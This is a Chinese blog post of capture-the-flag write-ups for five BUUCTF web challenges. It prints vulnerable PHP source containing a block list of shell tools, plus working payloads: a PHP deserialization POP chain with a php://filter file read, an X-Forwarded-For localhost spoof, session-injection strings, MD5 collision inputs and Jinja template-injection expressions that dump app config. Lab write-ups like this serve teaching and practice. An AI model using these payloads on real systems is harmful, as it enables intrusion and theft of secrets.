BUUCTF-WEB(46-50)

Muneyoshi發表於2024-05-28
Web

[安洵杯 2019]easy_web

開局注意到一個img和cmd引數

image-20240527214552399

img這個引數像base64,我們開啟cyberchef解密一下CyberChef

image-20240527214745092

解密是base64->base64->hex

我們加密 hex->base64->base64,我們這樣就可以獲得index.php的原始碼,所以我們這樣加密

然後我這邊好像有點問題

image-20240527215425639

這是正確的

?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

抓包看bp的響應包

image-20240527215514354

base64 解碼

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

因為需要MD5強相同,所以我們用fastcoll生成

隨便寫個文字,然後fastcoll會生成兩個MD5相等的文字

image-20240527220300286

我這裡想給他轉字串,我這裡指令碼跑不起來

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

然後我又試了試,根本繞不過MD5,可能題出問題了,也可能我出問題了

[MRCTF2020]Ezpop

參考:

「MRCTF2020」- Ezpop_mrctf2020-ezpop-CSDN部落格

開啟就是原始碼看看怎麼構造

image-20240528091344905

__wakeup() //執行unserialize()時,先會呼叫這個函式
__sleep() //執行serialize()時,先會呼叫這個函式
__destruct() //物件被銷燬時觸發
__call() //在物件上下文中呼叫不可訪問的方法時觸發
__callStatic() //在靜態上下文中呼叫不可訪問的方法時觸發
__get() //用於從不可訪問的屬性讀取資料或者不存在這個鍵都會呼叫此方法
__set() //用於將資料寫入不可訪問的屬性
__isset() //在不可訪問的屬性上呼叫isset()或empty()觸發
__unset() //在不可訪問的屬性上使用unset()時觸發
__toString() //把類當作字串使用時觸發
__invoke() //當嘗試將物件呼叫為函式時觸發

最後應該就是Modifier::__invoke去做一個檔案包含,我的pop鏈子構建不起來

這裡一直卡爆了,我一直想要用tostring,一直失敗了

後面也是得看懂了得用Show::__wakeup(),我之前以為是要跳過

我們梳理一下,我們需要用Show::wakeup去呼叫Show::tostring然後再去呼叫Test::__get然後就是Modifier::__invoke

總的鏈子

最後Modifier裡的var變數需要在內部修改,因為定義成了protected,我們去讀取flag的變數需要用

php://filter/read=convert.base64-encode/resource=flag.php

image-20240528101601758

Show::__wakeup()->Show::__toString()->Test::__get->Modifier::__invoke()->Modifier::append

這是最終構建的

image-20240528101419581

因為中間var變數是protected,序列化後有不可列印字元,所以我們url編碼一下

payload:

?pop=O%3A4%3A"Show"%3A2%3A%7Bs%3A6%3A"source"%3BO%3A4%3A"Show"%3A2%3A%7Bs%3A6%3A"source"%3Bs%3A9%3A"index.php"%3Bs%3A3%3A"str"%3BO%3A4%3A"Test"%3A1%3A%7Bs%3A1%3A"p"%3BO%3A8%3A"Modifier"%3A1%3A%7Bs%3A6%3A"%00%2A%00var"%3Bs%3A57%3A"php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php"%3B%7D%7D%7Ds%3A3%3A"str"%3BN%3B%7D

image-20240528101643941

[MRCTF2020]PYWebsite

開啟原始碼是這個

image-20240528102546048

然後我們直接去flag.php

image-20240528102753468

請求包加一個

X-Forwarded-For: 127.0.0.1

就得到flag

image-20240528102849103

[安洵杯 2019]easy_serialize_php

參考:

[安洵杯 2019]easy_serialize_php - 何止(h3zh1) - 部落格園 (cnblogs.com)

[BUUCTF之安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和程式碼審計_ctf 反序列化變數覆蓋-CSDN部落格

看到這個題目估計又不easy

原始碼提示phpinfo可能有東西

image-20240528103532238

?f=phpinfo

檢視一下。找到了這個檔案

	d0g3_f1ag.php

image-20240528103804444

那麼這裡應該就是flag放的位置,那我們現在應該利用反序列化去讀取這個檔案

image-20240528104009975

後面分析過程就看大佬的部落格吧,講的很好

payload為

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

image-20240528115145264

然後再把這檔名base64加密一下替換上個payload

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

image-20240528115244341

[WesternCTF2018]shrine

參考:

02_詳解Flask中的URL ——url_for() 與 自定義動態路由過濾器_url for-CSDN部落格

[buuctf-WesternCTF2018]shrine(小宇特詳解)-CSDN部落格

[WesternCTF2018]shrine - AW_SOLE - 部落格園 (cnblogs.com)

直接看原始碼

image-20240528163643255

應該是用了jinja這個模板,前面需要/shrine然後再輸入我們模板的內容試試

{{7*7}}

image-20240528163823328

 url_for()的作用:
如果我們在檢視函式中想使用一個url,比如給前端返回,或者我們在這個檢視函式中返回一個模板檔案都會使用到url,url相當於一把鑰匙可以開啟一些資源。如果你修改了註冊路由編寫的url規則,相當於修改了鑰匙。那麼其他的檢視函式依舊是使用了原來的鑰匙就無效了,如果專案是一個大專案,你一點點手動的去改涉及到的的url就不合理了。url_for()就是用來解決這個問題的。

既然是模板注入,我們就試試獲取一下全域性變數

{{url_for.__globals__}}

image-20240528170310579

然後獲取當前app的config,因為原始碼顯示flag載入在config

{{url_for.__globals__['current_app'].config}}

拿到flag

image-20240528170447168

相關文章